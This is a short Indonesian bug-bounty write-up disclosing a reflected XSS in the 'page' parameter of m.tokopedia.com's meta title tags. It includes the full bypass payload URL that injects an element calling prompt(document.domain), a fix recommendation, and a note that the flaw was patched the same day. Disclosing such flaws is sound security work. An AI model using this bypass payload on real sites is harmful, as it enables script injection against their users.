Another Tokopedia XSS via Meta Header

TLDR : m.tokopedia.com terdapat celah keamanan XSS pada meta header, tim Tokopedia melakukan patching di hari yang sama setelah report. Good Work!

URL : https://m.tokopedia.com/catalog/50985/oppo-a39?page=4&tab=gallery&utm_expid=87907915-89.sPf29QnwTF-igeChqJKVQA.0

Parameter : page

Keterangan :

Nilai dari parameter page ditulis ulang (reflective) dibeberapa tempat seperti :

1.  <meta name="title" content="Galeri Oppo A39 | Tokopedia, Halaman , Halaman 4" />
2.  <meta property="og:title" content="Galeri Oppo A39 | Tokopedia, Halaman , Halaman 4"/>
3.  <title>Galeri Oppo A39 | Tokopedia, Halaman , Halaman 4</title>

Dari hasil riset tags yang tidak terkena escape quote adalah tag nomor 1 dan 2. Masih dengan kurang lebih teknik bypass yang sama dengan report yang sebelumnya, akhirnya didapat payload seperti berikut :

https://m.tokopedia.com/catalog/50985/oppo-a39?page=4"><a<img src=”https://ethic.ninja" onerror>=prompt(document.domain)>&tab=gallery&utm_expid=87907915–89.sPf29QnwTF-igeChqJKVQA.0

XSS

Rekomendasi :

Perlu ditambahkan fungsi escape quote atau menggunakan metode white list karakter yang diperbolehkan.

Bounty :

Bounty Reward + Certificate

Like what you read? Give Dimaz Arno a round of applause.

From a quick cheer to a standing ovation, clap to show how much you enjoyed this story.